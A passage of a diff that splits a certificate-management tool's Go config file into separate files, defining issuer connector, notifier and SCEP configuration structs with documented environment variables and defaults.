|
||||||
|
// issuer-config types (cross-cutting validation logic stays
|
||||||
|
// in config.go).
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// Every type, exported field, and doc-comment is byte-identical to
|
||||||
|
// pre-split. Package stays `config`. Every external caller of
|
||||||
|
// `config.AWSACMPCAConfig` / `config.EntrustConfig` /
|
||||||
|
// `config.KeygenConfig` / etc. resolves the same way. None of these
|
||||||
|
// types declare an exported method; the entire surface is fields,
|
||||||
|
// preserved verbatim.
|
||||||
|
|
||||||
|
// AWSACMPCAConfig contains AWS ACM Private CA issuer connector configuration.
|
||||||
|
type AWSACMPCAConfig struct {
|
||||||
|
// Region is the AWS region where the Private CA resides (e.g., "us-east-1").
|
||||||
|
// Required for AWS ACM PCA integration.
|
||||||
|
// Setting: CERTCTL_AWS_PCA_REGION environment variable.
|
||||||
|
Region string
|
||||||
|
|
||||||
|
// CAArn is the ARN of the ACM Private CA certificate authority.
|
||||||
|
// Format: arn:aws:acm-pca:<region>:<account>:certificate-authority/<id>
|
||||||
|
// Required for AWS ACM PCA integration.
|
||||||
|
// Setting: CERTCTL_AWS_PCA_CA_ARN environment variable.
|
||||||
|
CAArn string
|
||||||
|
|
||||||
|
// SigningAlgorithm is the signing algorithm for certificate issuance.
|
||||||
|
// Valid: SHA256WITHRSA, SHA384WITHRSA, SHA512WITHRSA, SHA256WITHECDSA, SHA384WITHECDSA, SHA512WITHECDSA.
|
||||||
|
// Default: "SHA256WITHRSA".
|
||||||
|
// Setting: CERTCTL_AWS_PCA_SIGNING_ALGORITHM environment variable.
|
||||||
|
SigningAlgorithm string
|
||||||
|
|
||||||
|
// ValidityDays is the certificate validity period in days.
|
||||||
|
// Default: 365.
|
||||||
|
// Setting: CERTCTL_AWS_PCA_VALIDITY_DAYS environment variable.
|
||||||
|
ValidityDays int
|
||||||
|
|
||||||
|
// TemplateArn is the optional ARN of an ACM PCA certificate template.
|
||||||
|
// Used for constrained subordinate CAs or custom certificate profiles.
|
||||||
|
// Setting: CERTCTL_AWS_PCA_TEMPLATE_ARN environment variable.
|
||||||
|
TemplateArn string
|
||||||
|
}
|
||||||
|
|
||||||
|
// EntrustConfig contains Entrust Certificate Services issuer connector configuration.
|
||||||
|
// Entrust uses mTLS client certificate authentication.
|
||||||
|
type EntrustConfig struct {
|
||||||
|
// APIUrl is the Entrust CA Gateway base URL.
|
||||||
|
// Setting: CERTCTL_ENTRUST_API_URL environment variable.
|
||||||
|
APIUrl string
|
||||||
|
|
||||||
|
// ClientCertPath is the path to the mTLS client certificate PEM file.
|
||||||
|
// Setting: CERTCTL_ENTRUST_CLIENT_CERT_PATH environment variable.
|
||||||
|
ClientCertPath string
|
||||||
|
|
||||||
|
// ClientKeyPath is the path to the mTLS client private key PEM file.
|
||||||
|
// Setting: CERTCTL_ENTRUST_CLIENT_KEY_PATH environment variable.
|
||||||
|
ClientKeyPath string
|
||||||
|
|
||||||
|
// CAId is the Entrust CA identifier.
|
||||||
|
// Setting: CERTCTL_ENTRUST_CA_ID environment variable.
|
||||||
|
CAId string
|
||||||
|
|
||||||
|
// ProfileId is the optional enrollment profile identifier.
|
||||||
|
// Setting: CERTCTL_ENTRUST_PROFILE_ID environment variable.
|
||||||
|
ProfileId string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps GetOrderStatus's bounded-polling
|
||||||
|
// deadline. Approval-pending workflows should bump this (e.g.,
|
||||||
|
// 86400 = 24h) so a single tick can wait through the approval
|
||||||
|
// window. Default 600. Audit fix #5.
|
||||||
|
// Setting: CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// GlobalSignConfig contains GlobalSign Atlas HVCA issuer connector configuration.
|
||||||
|
// GlobalSign uses mTLS client certificate authentication plus API key/secret headers.
|
||||||
|
type GlobalSignConfig struct {
|
||||||
|
// APIUrl is the GlobalSign Atlas HVCA base URL (region-aware).
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_URL environment variable.
|
||||||
|
APIUrl string
|
||||||
|
|
||||||
|
// APIKey is the GlobalSign API key.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_KEY environment variable.
|
||||||
|
APIKey string
|
||||||
|
|
||||||
|
// APISecret is the GlobalSign API secret.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_SECRET environment variable.
|
||||||
|
APISecret string
|
||||||
|
|
||||||
|
// ClientCertPath is the path to the mTLS client certificate PEM file.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_CLIENT_CERT_PATH environment variable.
|
||||||
|
ClientCertPath string
|
||||||
|
|
||||||
|
// ClientKeyPath is the path to the mTLS client private key PEM file.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_CLIENT_KEY_PATH environment variable.
|
||||||
|
ClientKeyPath string
|
||||||
|
|
||||||
|
// ServerCAPath is the optional path to a PEM file containing the CA
|
||||||
|
// certificate(s) used to verify the GlobalSign Atlas HVCA API server
|
||||||
|
// certificate. If empty, the system trust store is used. Set this
|
||||||
|
// for private/lab Atlas deployments whose server TLS chain is not
|
||||||
|
// present in the host's default trust bundle.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_SERVER_CA_PATH environment variable.
|
||||||
|
ServerCAPath string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps GetOrderStatus's bounded-polling
|
||||||
|
// deadline. Default 600 (10 minutes). Audit fix #5.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_POLL_MAX_WAIT_SECONDS.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// EJBCAConfig contains EJBCA (Keyfactor) issuer connector configuration.
|
||||||
|
// EJBCA supports dual authentication: mTLS or OAuth2 Bearer token.
|
||||||
|
type EJBCAConfig struct {
|
||||||
|
// APIUrl is the EJBCA REST API base URL.
|
||||||
|
// Setting: CERTCTL_EJBCA_API_URL environment variable.
|
||||||
|
APIUrl string
|
||||||
|
|
||||||
|
// AuthMode selects the authentication method: "mtls" or "oauth2". Default: "mtls".
|
||||||
|
// Setting: CERTCTL_EJBCA_AUTH_MODE environment variable.
|
||||||
|
AuthMode string
|
||||||
|
|
||||||
|
// ClientCertPath is the path to the mTLS client certificate PEM file (required when auth_mode=mtls).
|
||||||
|
// Setting: CERTCTL_EJBCA_CLIENT_CERT_PATH environment variable.
|
||||||
|
ClientCertPath string
|
||||||
|
|
||||||
|
// ClientKeyPath is the path to the mTLS client private key PEM file (required when auth_mode=mtls).
|
||||||
|
// Setting: CERTCTL_EJBCA_CLIENT_KEY_PATH environment variable.
|
||||||
|
ClientKeyPath string
|
||||||
|
|
||||||
|
// Token is the OAuth2 Bearer token (required when auth_mode=oauth2).
|
||||||
|
// Setting: CERTCTL_EJBCA_TOKEN environment variable.
|
||||||
|
Token string
|
||||||
|
|
||||||
|
// CAName is the EJBCA CA name. Required.
|
||||||
|
// Setting: CERTCTL_EJBCA_CA_NAME environment variable.
|
||||||
|
CAName string
|
||||||
|
|
||||||
|
// CertProfile is the optional EJBCA certificate profile name.
|
||||||
|
// Setting: CERTCTL_EJBCA_CERT_PROFILE environment variable.
|
||||||
|
CertProfile string
|
||||||
|
|
||||||
|
// EEProfile is the optional EJBCA end-entity profile name.
|
||||||
|
// Setting: CERTCTL_EJBCA_EE_PROFILE environment variable.
|
||||||
|
EEProfile string
|
||||||
|
}
|
||||||
|
|
||||||
|
// KeygenConfig controls where private keys are generated.
|
||||||
|
type KeygenConfig struct {
|
||||||
|
// Mode determines where certificate private keys are generated.
|
||||||
|
// Valid values: "agent" (default, production) or "server" (demo only).
|
||||||
|
// In "agent" mode, renewal/issuance jobs enter AwaitingCSR state and agents
|
||||||
|
// generate ECDSA P-256 keys locally. Private keys never leave agent infrastructure.
|
||||||
|
// In "server" mode, the control plane generates RSA keys — demo only, not for production
|
||||||
|
// as private keys touch the server. Requires explicit opt-in.
|
||||||
|
Mode string
|
||||||
|
}
|
||||||
|
|
||||||
|
// CAConfig controls the Local CA's operating mode.
|
||||||
|
type CAConfig struct {
|
||||||
|
// CertPath is the path to a PEM-encoded CA certificate for sub-CA mode.
|
||||||
|
// When set with KeyPath, the Local CA loads this cert instead of generating a self-signed root.
|
||||||
|
// Required: sub-CA mode must have both CertPath and KeyPath set.
|
||||||
|
// Optional: leave empty for self-signed mode (development/demo). Path must be absolute.
|
||||||
|
CertPath string
|
||||||
|
|
||||||
|
// KeyPath is the path to a PEM-encoded CA private key for sub-CA mode.
|
||||||
|
// Supports RSA, ECDSA, and PKCS#8 encoded keys.
|
||||||
|
// Required: must be set together with CertPath for sub-CA mode.
|
||||||
|
// Optional: leave empty for self-signed mode (development/demo). Path must be absolute.
|
||||||
|
KeyPath string
|
||||||
|
}
|
||||||
|
|
||||||
|
// StepCAConfig contains step-ca issuer connector configuration.
|
||||||
|
type StepCAConfig struct {
|
||||||
|
// URL is the base URL of the step-ca server.
|
||||||
|
// Example: "https://ca.example.com:9000". Required for step-ca integration.
|
||||||
|
URL string
|
||||||
|
|
||||||
|
// ProvisionerName is the name of the JWK provisioner configured in step-ca.
|
||||||
|
// Used to select which provisioner signs the certificate requests.
|
||||||
|
ProvisionerName string
|
||||||
|
|
||||||
|
// ProvisionerKeyPath is the path to the PEM-encoded JWK provisioner private key.
|
||||||
|
// Authenticates with the step-ca /sign API. Must be absolute path.
|
||||||
|
ProvisionerKeyPath string
|
||||||
|
|
||||||
|
// ProvisionerPassword is the optional password for the provisioner private key.
|
||||||
|
// Leave empty if the key file is not encrypted.
|
||||||
|
ProvisionerPassword string
|
||||||
|
}
|
||||||
|
|
||||||
|
// VaultConfig contains HashiCorp Vault PKI issuer connector configuration.
|
||||||
|
type VaultConfig struct {
|
||||||
|
// Addr is the Vault server address (e.g., "https://vault.example.com:8200").
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_ADDR environment variable.
|
||||||
|
Addr string
|
||||||
|
|
||||||
|
// Token is the Vault token for authentication.
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_TOKEN environment variable.
|
||||||
|
Token string
|
||||||
|
|
||||||
|
// Mount is the PKI secrets engine mount path.
|
||||||
|
// Default: "pki".
|
||||||
|
// Setting: CERTCTL_VAULT_MOUNT environment variable.
|
||||||
|
Mount string
|
||||||
|
|
||||||
|
// Role is the PKI role name used for signing certificates.
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_ROLE environment variable.
|
||||||
|
Role string
|
||||||
|
|
||||||
|
// TTL is the requested certificate time-to-live.
|
||||||
|
// Default: "8760h" (1 year).
|
||||||
|
// Setting: CERTCTL_VAULT_TTL environment variable.
|
||||||
|
TTL string
|
||||||
|
}
|
||||||
|
|
||||||
|
// DigiCertConfig contains DigiCert CertCentral issuer connector configuration.
|
||||||
|
type DigiCertConfig struct {
|
||||||
|
// APIKey is the CertCentral API key for authentication.
|
||||||
|
// Required for DigiCert integration.
|
||||||
|
// Setting: CERTCTL_DIGICERT_API_KEY environment variable.
|
||||||
|
APIKey string
|
||||||
|
|
||||||
|
// OrgID is the DigiCert organization ID for certificate orders.
|
||||||
|
// Required for DigiCert integration.
|
||||||
|
// Setting: CERTCTL_DIGICERT_ORG_ID environment variable.
|
||||||
|
OrgID string
|
||||||
|
|
||||||
|
// ProductType is the DigiCert product type for certificate orders.
|
||||||
|
// Default: "ssl_basic". Common values: "ssl_basic", "ssl_wildcard", "ssl_ev_basic".
|
||||||
|
// Setting: CERTCTL_DIGICERT_PRODUCT_TYPE environment variable.
|
||||||
|
ProductType string
|
||||||
|
|
||||||
|
// BaseURL is the DigiCert CertCentral API base URL.
|
||||||
|
// Default: "https://www.digicert.com/services/v2".
|
||||||
|
// Setting: CERTCTL_DIGICERT_BASE_URL environment variable.
|
||||||
|
BaseURL string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps how long GetOrderStatus blocks doing
|
||||||
|
// internal exponential-backoff polling before returning. Default
|
||||||
|
// 600 (10 minutes); 0 falls back to asyncpoll default.
|
||||||
|
// Setting: CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS. Audit fix #5.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// SectigoConfig contains Sectigo Certificate Manager issuer connector configuration.
|
||||||
|
type SectigoConfig struct {
|
||||||
|
// CustomerURI is the Sectigo customer URI (organization identifier).
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_CUSTOMER_URI environment variable.
|
||||||
|
CustomerURI string
|
||||||
|
|
||||||
|
// Login is the Sectigo API account login.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_LOGIN environment variable.
|
||||||
|
Login string
|
||||||
|
|
||||||
|
// Password is the Sectigo API account password or API key.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_PASSWORD environment variable.
|
||||||
|
Password string
|
||||||
|
|
||||||
|
// OrgID is the Sectigo organization ID for certificate enrollments.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_ORG_ID environment variable.
|
||||||
|
OrgID int
|
||||||
|
|
||||||
|
// CertType is the Sectigo certificate type ID (from GET /ssl/v1/types).
|
||||||
|
// Required for enrollment. Set via CERTCTL_SECTIGO_CERT_TYPE environment variable.
|
||||||
|
CertType int
|
||||||
|
|
||||||
|
// Term is the certificate validity in days (e.g., 365, 730).
|
||||||
|
// Default: 365.
|
||||||
|
// Setting: CERTCTL_SECTIGO_TERM environment variable.
|
||||||
|
Term int
|
||||||
|
|
||||||
|
// BaseURL is the Sectigo SCM API base URL.
|
||||||
|
// Default: "https://cert-manager.com/api".
|
||||||
|
// Setting: CERTCTL_SECTIGO_BASE_URL environment variable.
|
||||||
|
BaseURL string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps how long GetOrderStatus blocks doing
|
||||||
|
// internal exponential-backoff polling. Default 600. Sectigo's
|
||||||
|
// collectNotReady sentinel rides the backoff schedule.
|
||||||
|
// Setting: CERTCTL_SECTIGO_POLL_MAX_WAIT_SECONDS. Audit fix #5.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// GoogleCASConfig contains Google Cloud Certificate Authority Service configuration.
|
||||||
|
type GoogleCASConfig struct {
|
||||||
|
// Project is the GCP project ID.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_PROJECT environment variable.
|
||||||
|
Project string
|
||||||
|
|
||||||
|
// Location is the GCP region (e.g., "us-central1").
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_LOCATION environment variable.
|
||||||
|
Location string
|
||||||
|
|
||||||
|
// CAPool is the Certificate Authority pool name.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_CA_POOL environment variable.
|
||||||
|
CAPool string
|
||||||
|
|
||||||
|
// Credentials is the path to the service account JSON credentials file.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_CREDENTIALS environment variable.
|
||||||
|
Credentials string
|
||||||
|
|
||||||
|
// TTL is the default certificate time-to-live.
|
||||||
|
// Default: "8760h" (1 year).
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_TTL environment variable.
|
||||||
|
TTL string
|
||||||
|
}
|
||||||
|
|
||||||
|
// OpenSSLConfig contains OpenSSL/Custom CA issuer connector configuration.
|
||||||
|
type OpenSSLConfig struct {
|
||||||
|
// SignScript is the path to a shell script that signs certificate requests.
|
||||||
|
// Script receives: CSR_PATH, COMMON_NAME, OUTPUT_CERT_PATH as env vars.
|
||||||
|
// Must output the signed certificate PEM to OUTPUT_CERT_PATH.
|
||||||
|
// Example: /opt/ca-scripts/sign.sh
|
||||||
|
SignScript string
|
||||||
|
|
||||||
|
// RevokeScript is the path to a shell script that revokes certificates.
|
||||||
|
// Script receives: SERIAL_NUMBER, REASON_CODE as env vars.
|
||||||
|
// Best-effort: script failures do not block revocation recording.
|
||||||
|
// Leave empty if revocation is not supported by the custom CA.
|
||||||
|
RevokeScript string
|
||||||
|
|
||||||
|
// CRLScript is the path to a shell script that generates CRL (Certificate Revocation List).
|
||||||
|
// Script should output the DER-encoded CRL to stdout.
|
||||||
|
// Leave empty if CRL generation is not supported by the custom CA.
|
||||||
|
CRLScript string
|
||||||
|
|
||||||
|
// TimeoutSeconds is the maximum execution time for any shell script invocation.
|
||||||
|
// Default: 30 seconds. Prevents hung processes from blocking certificate operations.
|
||||||
|
TimeoutSeconds int
|
||||||
|
}
|
||||||
@@ -0,0 +1,86 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure (2026-05-14): extracted from config.go to
|
||||||
|
// reduce the change-risk hotspot footprint of the giant config file
|
||||||
|
// (config.go pre-Phase-9 was 3,403 LOC, exceeding the < 500 LOC
|
||||||
|
// target). This file contains the NotifierConfig struct unchanged —
|
||||||
|
// every field, doc-comment, and exported name is byte-identical to
|
||||||
|
// the pre-split form. The struct lives in the same `config` package
|
||||||
|
// so every caller's `config.NotifierConfig` import path is preserved
|
||||||
|
// without modification.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: any code importing
|
||||||
|
// `github.com/certctl-io/certctl/internal/config` reads
|
||||||
|
// `NotifierConfig` the same way before and after this split. The
|
||||||
|
// `go doc internal/config NotifierConfig` output is identical.
|
||||||
|
|
||||||
|
// NotifierConfig contains configuration for notification connectors.
|
||||||
|
// Each notifier is enabled by setting its required env var (webhook URL or API key).
|
||||||
|
type NotifierConfig struct {
|
||||||
|
// SlackWebhookURL is the incoming webhook URL for Slack notifications.
|
||||||
|
// Format: https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
|
||||||
|
// Optional: leave empty to disable Slack notifications.
|
||||||
|
SlackWebhookURL string
|
||||||
|
|
||||||
|
// SlackChannel optionally overrides the default channel in the Slack webhook.
|
||||||
|
// Example: "#alerts" or "@user". Leave empty to use webhook's default channel.
|
||||||
|
SlackChannel string
|
||||||
|
|
||||||
|
// SlackUsername sets the display name for Slack bot messages.
|
||||||
|
// Default: "certctl". Used in webhook message formatting.
|
||||||
|
SlackUsername string
|
||||||
|
|
||||||
|
// TeamsWebhookURL is the incoming webhook URL for Microsoft Teams notifications.
|
||||||
|
// Format: https://outlook.webhook.office.com/webhookb2/...
|
||||||
|
// Optional: leave empty to disable Teams notifications.
|
||||||
|
TeamsWebhookURL string
|
||||||
|
|
||||||
|
// PagerDutyRoutingKey is the integration key for PagerDuty Events API v2.
|
||||||
|
// Obtain from PagerDuty integration settings.
|
||||||
|
// Optional: leave empty to disable PagerDuty notifications.
|
||||||
|
PagerDutyRoutingKey string
|
||||||
|
|
||||||
|
// PagerDutySeverity sets the default severity level for PagerDuty events.
|
||||||
|
// Valid values: "info", "warning", "error", "critical". Default: "warning".
|
||||||
|
PagerDutySeverity string
|
||||||
|
|
||||||
|
// OpsGenieAPIKey is the API key for OpsGenie Alert API v2.
|
||||||
|
// Obtain from OpsGenie organization settings.
|
||||||
|
// Optional: leave empty to disable OpsGenie notifications.
|
||||||
|
OpsGenieAPIKey string
|
||||||
|
|
||||||
|
// OpsGeniePriority sets the default priority for OpsGenie alerts.
|
||||||
|
// Valid values: "P1", "P2", "P3", "P4", "P5". Default: "P3".
|
||||||
|
OpsGeniePriority string
|
||||||
|
|
||||||
|
// SMTPHost is the SMTP server hostname for sending email notifications.
|
||||||
|
// Example: "smtp.gmail.com", "smtp.sendgrid.net". Required for email notifications.
|
||||||
|
// Setting: CERTCTL_SMTP_HOST environment variable.
|
||||||
|
SMTPHost string
|
||||||
|
|
||||||
|
// SMTPPort is the SMTP server port. Default: 587 (STARTTLS).
|
||||||
|
// Common values: 25 (plain), 465 (implicit TLS), 587 (STARTTLS).
|
||||||
|
// Setting: CERTCTL_SMTP_PORT environment variable.
|
||||||
|
SMTPPort int
|
||||||
|
|
||||||
|
// SMTPUsername is the SMTP authentication username.
|
||||||
|
// Setting: CERTCTL_SMTP_USERNAME environment variable.
|
||||||
|
SMTPUsername string
|
||||||
|
|
||||||
|
// SMTPPassword is the SMTP authentication password or app-specific password.
|
||||||
|
// Setting: CERTCTL_SMTP_PASSWORD environment variable.
|
||||||
|
SMTPPassword string
|
||||||
|
|
||||||
|
// SMTPFromAddress is the sender email address for outbound notifications.
|
||||||
|
// Example: "certctl@example.com", "noreply@company.com".
|
||||||
|
// Setting: CERTCTL_SMTP_FROM_ADDRESS environment variable.
|
||||||
|
SMTPFromAddress string
|
||||||
|
|
||||||
|
// SMTPUseTLS enables TLS for the SMTP connection.
|
||||||
|
// Default: true. Set to false for plain SMTP (not recommended).
|
||||||
|
// Setting: CERTCTL_SMTP_USE_TLS environment variable.
|
||||||
|
SMTPUseTLS bool
|
||||||
|
}
|
||||||
@@ -0,0 +1,402 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 3 (2026-05-14): extracted from
|
||||||
|
// config.go. Larger and more complex than Sprints 1+2 because the
|
||||||
|
// SCEP surface has THREE structs AND three helper functions that
|
||||||
|
// move together:
|
||||||
|
//
|
||||||
|
// SCEPConfig — top-level multi-profile config
|
||||||
|
// (Enabled + Profiles slice + the
|
||||||
|
// legacy single-profile flat fields
|
||||||
|
// kept for backward compat).
|
||||||
|
// SCEPProfileConfig — one SCEP endpoint's binding
|
||||||
|
// (PathID + IssuerID + ProfileID +
|
||||||
|
// ChallengePassword + RA cert/key +
|
||||||
|
// mTLS sibling-route gate + per-
|
||||||
|
// profile Intune block).
|
||||||
|
// SCEPIntuneProfileConfig — per-profile Microsoft Intune
|
||||||
|
// Certificate Connector integration
|
||||||
|
// (Enabled, ConnectorCertPath,
|
||||||
|
// Audience, ChallengeValidity,
|
||||||
|
// PerDeviceRateLimit24h,
|
||||||
|
// ClockSkewTolerance).
|
||||||
|
//
|
||||||
|
// loadSCEPProfilesFromEnv — reads CERTCTL_SCEP_PROFILES +
|
||||||
|
// expands each name into a
|
||||||
|
// SCEPProfileConfig via the
|
||||||
|
// CERTCTL_SCEP_PROFILE_<NAME>_*
|
||||||
|
// indexed env-var family.
|
||||||
|
// mergeSCEPLegacyIntoProfiles — backward-compat shim: when
|
||||||
|
// Profiles is empty AND legacy flat
|
||||||
|
// fields are populated, synthesize
|
||||||
|
// Profiles[0] with PathID="" so
|
||||||
|
// /scep dispatches as it did
|
||||||
|
// pre-Phase-1.5.
|
||||||
|
// validSCEPPathID — path-segment validator (ASCII
|
||||||
|
// [a-z0-9-], no leading/trailing
|
||||||
|
// hyphen, empty allowed). Called
|
||||||
|
// from Config.Validate() in
|
||||||
|
// config.go.
|
||||||
|
//
|
||||||
|
// All callers stay in config.go and continue to resolve via
|
||||||
|
// same-package lookup. Specifically:
|
||||||
|
// - Load() calls loadSCEPProfilesFromEnv() during initial cfg.SCEP
|
||||||
|
// construction (currently config.go's Load body)
|
||||||
|
// - Load() calls mergeSCEPLegacyIntoProfiles(&cfg.SCEP) after the
|
||||||
|
// initial profile-load
|
||||||
|
// - Validate() calls validSCEPPathID(p.PathID) per-profile
|
||||||
|
//
|
||||||
|
// The unexported helpers getEnv / getEnvBool / getEnvInt /
|
||||||
|
// getEnvDuration used by loadSCEPProfilesFromEnv also stay in
|
||||||
|
// config.go (shared across every config family); same-package
|
||||||
|
// resolution makes the calls work without any import change.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config SCEPConfig`,
|
||||||
|
// `go doc internal/config SCEPProfileConfig`, and
|
||||||
|
// `go doc internal/config SCEPIntuneProfileConfig` produce
|
||||||
|
// identical output before and after this split. Unexported helpers
|
||||||
|
// are unaffected by `go doc` (which only shows the exported
|
||||||
|
// surface).
|
||||||
|
|
||||||
|
// SCEPConfig controls the RFC 8894 Simple Certificate Enrollment Protocol server.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 1.5: this type was originally a
|
||||||
|
// single flat struct with one IssuerID + one RA pair + one challenge password
|
||||||
|
// (the shape of v2.0.x). Real enterprise deployments need to expose multiple
|
||||||
|
// SCEP endpoints from one certctl instance — corp-laptop CA, server CA, IoT
|
||||||
|
// CA — each with its own issuer + RA pair + challenge password + URL path
|
||||||
|
// (/scep/<pathID>). The Profiles slice carries that. Existing operators see
|
||||||
|
// no behavior change: when Profiles is empty AND the legacy single-profile
|
||||||
|
// fields below are set, ConfigLoad synthesizes a single-element Profiles[0]
|
||||||
|
// with PathID="" (which maps to the legacy /scep root path).
|
||||||
|
type SCEPConfig struct {
|
||||||
|
// Enabled controls whether SCEP endpoints are available for device enrollment.
|
||||||
|
// Default: false (SCEP disabled). Set to true to enable SCEP endpoints under /scep/.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// Profiles is the multi-endpoint configuration. Each profile gets its own
|
||||||
|
// URL path (/scep/<PathID>), its own RA cert + key, its own challenge
|
||||||
|
// password, and its own bound issuer. Population sources, in priority order:
|
||||||
|
//
|
||||||
|
// 1. Explicit list via CERTCTL_SCEP_PROFILES (e.g. "corp,iot,server").
|
||||||
|
// 2. Backward-compat shim: when CERTCTL_SCEP_PROFILES is unset AND the
|
||||||
|
// legacy flat fields below have ChallengePassword OR RACertPath set,
|
||||||
|
// ConfigLoad synthesizes a single-element Profiles[0] with PathID=""
|
||||||
|
// so /scep continues to route the same way it did pre-Phase-1.5.
|
||||||
|
//
|
||||||
|
// Validate() iterates Profiles and refuses to boot if any profile is
|
||||||
|
// malformed (empty ChallengePassword, missing RA pair, invalid PathID).
|
||||||
|
// Each profile's ChallengePassword + RA pair are independently mandatory
|
||||||
|
// — the profile-load shim never silently borrows from a sibling profile.
|
||||||
|
Profiles []SCEPProfileConfig
|
||||||
|
|
||||||
|
// Legacy single-profile fields — preserved for backward compatibility. New
|
||||||
|
// operators should populate Profiles directly via the indexed env-var form.
|
||||||
|
// These fields are merged into Profiles[0] by ConfigLoad when Profiles is
|
||||||
|
// empty AND any of these fields are non-zero.
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector processes SCEP certificate requests
|
||||||
|
// for the legacy single-profile config. Default: "iss-local". Must reference a
|
||||||
|
// configured issuer.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains SCEP enrollments to a specific certificate profile
|
||||||
|
// for the legacy single-profile config. Leave empty to allow SCEP to use any
|
||||||
|
// configured issuer's defaults.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// ChallengePassword is the shared secret used to authenticate SCEP enrollment requests.
|
||||||
|
// Clients include this in the PKCS#10 CSR challengePassword attribute.
|
||||||
|
//
|
||||||
|
// REQUIRED when Enabled is true. Config.Validate() below refuses to start the
|
||||||
|
// server if SCEP is enabled and this value is empty (H-2, CWE-306): post-M-001
|
||||||
|
// under option (D), the /scep endpoint rides the no-auth middleware chain per
|
||||||
|
// RFC 8894 §3.2, so the challenge password is the sole application-layer
|
||||||
|
// authentication boundary for SCEP enrollment. An empty shared secret would
|
||||||
|
// allow any client that can reach /scep to enroll a CSR against the configured
|
||||||
|
// issuer. The service-layer PKCSReq path also rejects this configuration
|
||||||
|
// defense-in-depth.
|
||||||
|
//
|
||||||
|
// Legacy single-profile field; merged into Profiles[0].ChallengePassword by
|
||||||
|
// ConfigLoad when Profiles is empty.
|
||||||
|
ChallengePassword string
|
||||||
|
|
||||||
|
// RACertPath is the path to a PEM-encoded RA (Registration Authority)
|
||||||
|
// certificate used by the RFC 8894 SCEP path. SCEP clients encrypt their
|
||||||
|
// PKCS#10 CSR to this cert's public key (via the EnvelopedData wrapper, RFC
|
||||||
|
// 8894 §3.2.2). The certctl server uses RAKeyPath to decrypt inbound
|
||||||
|
// EnvelopedData and to sign outbound CertRep PKIMessage signerInfo (RFC
|
||||||
|
// 8894 §3.3.2).
|
||||||
|
//
|
||||||
|
// Required when Enabled is true; Config.Validate() refuses to start without
|
||||||
|
// it. Without an RA pair the new RFC 8894 path silently falls through to
|
||||||
|
// the MVP raw-CSR path on every request and the operator's intent is
|
||||||
|
// unclear — fail loud at startup instead.
|
||||||
|
//
|
||||||
|
// Generation: a self-signed RA cert with subject "CN=<your-ca-id>-RA" and
|
||||||
|
// the id-kp-emailProtection / id-kp-cmcRA EKU is sufficient. The RA cert
|
||||||
|
// SHOULD be the same cert returned by GetCACert (RFC 8894 §3.5.1) so
|
||||||
|
// clients encrypt to a key the server can decrypt with. See
|
||||||
|
// docs/legacy-est-scep.md for the openssl recipe.
|
||||||
|
RACertPath string
|
||||||
|
|
||||||
|
// RAKeyPath is the path to the PEM-encoded private key matching RACertPath.
|
||||||
|
// File MUST be mode 0600 (owner read/write only); preflight refuses to load
|
||||||
|
// a world-readable RA key as defense-in-depth against credential leak. The
|
||||||
|
// server only ever reads this file at startup; rotation requires a restart
|
||||||
|
// (per the existing CERTCTL_TLS_CERT_PATH precedent in cmd/server/tls.go).
|
||||||
|
//
|
||||||
|
